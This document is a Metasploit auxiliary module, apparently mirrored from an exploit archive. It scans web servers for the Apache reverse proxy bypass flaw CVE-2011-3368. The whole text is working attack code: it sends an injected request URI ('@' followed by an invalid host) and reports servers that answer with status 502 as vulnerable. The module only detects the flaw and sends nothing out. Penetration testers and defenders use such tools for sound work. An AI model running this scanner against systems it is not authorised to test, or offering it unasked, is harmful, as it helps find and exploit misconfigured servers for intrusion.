## https://sploitus.com/exploit?id=PACKETSTORM:181059
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner',
'Description' => %q{
Scan for poorly configured reverse proxy servers.
By default, this module attempts to force the server to make
a request with an invalid domain name. Then, if the bypass
is successful, the server will look it up and of course fail,
then responding with a status code 502. A baseline status code
is always established and if that baseline matches your test
status code, the injection attempt does not occur.
"set VERBOSE true" if you are paranoid and want to catch potential
false negatives. Works best against Apache and mod_rewrite
},
'Author' => ['chao-mu'],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.contextis.com/research/blog/reverseproxybypass/'],
['CVE', '2011-3368'],
]
)
register_options(
[
OptString.new('ESCAPE_SEQUENCE',
[true, 'Character(s) that terminate the rewrite rule', '@']),
OptString.new('INJECTED_URI',
[true, 'String injected after escape sequence', '...']),
OptInt.new('EXPECTED_RESPONSE',
[true, 'Status code that indicates vulnerability', 502]),
OptString.new('BASELINE_URI',
[true, 'Requested to establish that EXPECTED_RESPONSE is not the usual response', '/']),
])
end
def make_request(host, uri, timeout=20)
begin
requested_at = Time.now.utc
response = send_request_raw({'uri' => uri}, timeout)
responded_at = Time.now.utc
rescue ::Rex::ConnectionError => e
vprint_error e.to_s
return nil
end
if response.nil?
vprint_error "#{rhost}:#{rport} Request timed out"
return nil
end
seconds_transpired = (responded_at - requested_at).to_f
vprint_status "#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}"
status_code = response.code
vprint_status "#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}"
return {
:requested_at => requested_at,
:responded_at => responded_at,
:status_code => status_code
}
end
def run_host(host)
test_status_code = datastore['EXPECTED_RESPONSE']
baseline = make_request(host, datastore['BASELINE_URI'])
if baseline.nil?
return
end
if baseline[:status_code] == test_status_code
vprint_error "#{rhost}:#{rport} The baseline status code for #{host} matches our test's"
return
end
uri = datastore['ESCAPE_SEQUENCE'] + datastore['INJECTED_URI']
injection_info = make_request(host, uri, 60)
status_code = injection_info[:status_code]
if status_code == test_status_code
print_good "#{rhost}:#{rport} Server appears to be vulnerable!"
report_vuln(
:host => host,
:port => rport,
:proto => 'tcp',
:sname => ssl ? 'https' : 'http',
:name => self.name,
:info => "Module #{self.fullname} obtained #{status_code} when requesting #{uri}",
:refs => self.references,
:exploited_at => injection_info[:requested_at]
)
end
end
end